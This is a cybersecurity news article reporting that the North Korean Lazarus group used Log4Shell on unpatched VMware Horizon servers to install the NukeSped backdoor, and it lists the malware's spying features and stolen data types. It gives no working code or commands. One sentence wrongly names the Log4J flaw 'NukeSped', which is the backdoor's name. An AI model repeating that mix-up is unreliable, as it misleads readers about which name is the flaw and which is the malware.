Cyber Security News

Lazarus hackers Attack VMware Servers Using Log4Shell Exploits

One of the most prominent North Korean hacking groups, Lazarus exploited the Log4J RCE vulnerability known as “NukeSped” to inject backdoors aboard VMware Horizon servers to retrieve information stealing payloads.

CVE-2021-44228 (log4Shell) is the CVE ID that has been tracked and identifies this vulnerability, which affects a wide range of products, including the VMware Horizon as well.

It has been claimed by the Cyber Security analysts at Ahnlab’s ASEC that since April 2022 the threat actors behind the Lazarus group have been targeting the vulnerable VMware products through Log4Shell.

In January 2022, it has been found that vulnerabilities exist in Horizon deployments. However, many administrators still have not applied the latest security updates.

VMware Horizon Servers Were Targeted

Vmware Horizon’s Apache Tomcat service was exploited by the threat actors in order to execute the PowerShell command to exploit the Log4j vulnerability.

It is very likely that by running this PowerShell command, the NukeSped backdoor on the server will be installed. 

Backdoor malware such as NukeSped is capable of receiving commands from the C&C server and executing them on the attacker’s behalf. In the summer of 2018, NukeSped was associated with hackers affiliated with the DPRK and was then linked to a 2020 campaign that was staged by Lazarus.

In the latest variant, C++ language is the dialect of choice, and secure communication with C2 is ensured using RC4 encryption. While in its previous version, XOR encryption was used.


Under compromised conditions, NukeSped performs a variety of espionage activities, and here below we have mentioned:-

  • Taking screenshots
  • Recording key presses
  • Accessing files
  • Support for command-line commands

Currently, there are two modules that are part of the current NukeSped variant, one which dumps contents from USB devices and another which allows you to access web cameras.

Data Targeted

There are several types of data that can be stolen by malware, and here they are mentioned below:-

  • Account credentials
  • Browsing history
  • Email account information
  • Names of recently used files from MS Office

There have been instances where Lazarus can be seen using Jin Miner instead of NukeSped by means of Log4Shell in some attacks.

The recent Lazarus incident is the second known example of a malware campaign using LoLBins in a Windows-targeting campaign. The other was the use of crypto-mining malware on macOS and Windows computers.

To highlight the variety of tactics used by the hacker group for their attacks, on top of them there is the exploitation of Log4Shell.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.


Gurubaran is a Security Consultant, Security Editor & Co-Founder of Cyber Security News & GBHackers On Security.

Recent Posts

Defend Ransomware Attacks With Top Effective Proactive Measures in 2024

We're currently living in an age where digital threats loom large. Among these, ransomware has…

54 mins ago

GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability

Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ…

18 hours ago

Cybercriminals are Showing Hesitation to Utilize AI When Executing Cyber Attacks

Media reports highlight the sale of LLMs like WormGPT and FraudGPT on underground forums. Fears…

18 hours ago

Vigil: Open-source Security Scanner for LLM Models Like ChatGPT

An open-source security scanner, developed by Git Hub user Adam Swanda, was released to explore…

19 hours ago

Slovenia’s Biggest Power Provider has Suffered a Cyberattack

One of Slovenia's major power providers, HSE, has recently fallen victim to a significant cyberattack.…

19 hours ago

Genesis Market Technique: Hackers Exploited Node.js and EV Certificates

In the labyrinthine landscape of cyber threats, the Trend Micro Managed XDR team has uncovered…

21 hours ago